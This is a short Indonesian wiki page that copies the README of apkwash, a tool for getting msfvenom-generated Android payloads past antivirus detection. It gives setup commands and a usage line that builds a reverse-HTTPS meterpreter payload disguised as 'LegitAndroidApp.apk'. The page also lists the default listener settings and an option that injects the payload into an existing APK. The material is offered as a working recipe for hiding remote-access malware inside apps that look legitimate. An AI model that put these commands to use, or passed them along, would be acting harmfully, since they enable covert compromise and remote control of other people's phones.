Difference between revisions of "MSF: apkwash untuk mengelabuhi antivirus"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) (Created page with "sumber: https://github.com/jbreed/apkwash apkwash Android APK Antivirus evasion for msfvenom generated payloads. Tested on Kali linux rolling. Setup: apt-get update && a...") |
Onnowpurbo (talk | contribs) |
||
Line 44: | Line 44: | ||
* https://github.com/jbreed/apkwash | * https://github.com/jbreed/apkwash | ||
+ | * https://pentestlab.blog/2017/03/13/injecting-metasploit-payloads-into-android-applications/ |
Latest revision as of 13:11, 1 June 2017
sumber: https://github.com/jbreed/apkwash
apkwash
Android APK Antivirus evasion for msfvenom generated payloads.
Tested on Kali linux rolling.
Setup:
apt-get update && apt-get dist-upgrade chmod +x apkwash mv apkwash /usr/local/bin/.
On first run:
- Downloads and places apktool.jar in the user's /usr/local/bin directory
- Generates debug keystore for signing. Places it in ~/.android/
Usage Example:
apkwash -p android/meterpreter/reverse_https LHOST= LPORT= -o LegitAndroidApp.apk
Output:
<LegitAndroidApp>.apk & <LegitAndroidApp>.listener
Default values:
payload=android/meterpreter/reverse_https LHOST=<eth0 IP address> LPORT=443 output=AndroidService.apk
Options
-p | --payload <payload> This sets the payload to be generated by msfvenom. -o | --output <outfile.apk> This sets the name of the APK created as well as the output apk file. -x | --original <infile.apk> Input APK to inject the payload into (later update). -g | --generate Generate a payload using defaults -n | --newkey Generate a new debug key before signing -v | --verbose Don't mask output of commands -d | --debug Leaves the /tmp/payload files in place for review -h | --help Help information